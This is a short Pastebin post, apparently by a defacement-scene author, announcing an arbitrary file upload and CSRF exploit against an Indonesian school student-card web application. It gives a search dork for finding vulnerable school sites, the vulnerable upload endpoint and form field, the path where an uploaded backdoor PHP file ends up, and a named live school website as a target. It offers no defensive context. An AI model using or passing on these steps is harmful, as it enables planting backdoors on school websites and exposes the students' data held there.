Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Aplikasi Kartu Pelajar Vulnerability arbitrary file upload with
- CSRF(indonesian school)
- [+]Exploit title: Aplikasi Kartu Pelajar Vulnerability arbitrary file upload with CSRF(indonesian school)
- [+]Author : ./meicookies
- [+]Dork : intext:Responsive image aplikasi kartu pelajar sch.id
- [+] Exploit: kartu.localcrot.sch.id/user/aksi/ubah_pelajar.php
- if there is an alert "Data Berhasil di Ubah" the fucking website is vulnerable to arbitrary file upload
- [+] CSRF :
- https://tools.xploitsecid.or(.)id/Exploit/CSRF
- postfile : gambar
- [!] File Location :
- The files you upload will go to
- kartu.localcrot.sch.id/img/your_backdoor.php
- [!] Live target : http://kartu.mit-alishlah.sch.id/user/aksi/ubah_pelajar.php
Add Comment
Please, Sign In to add comment
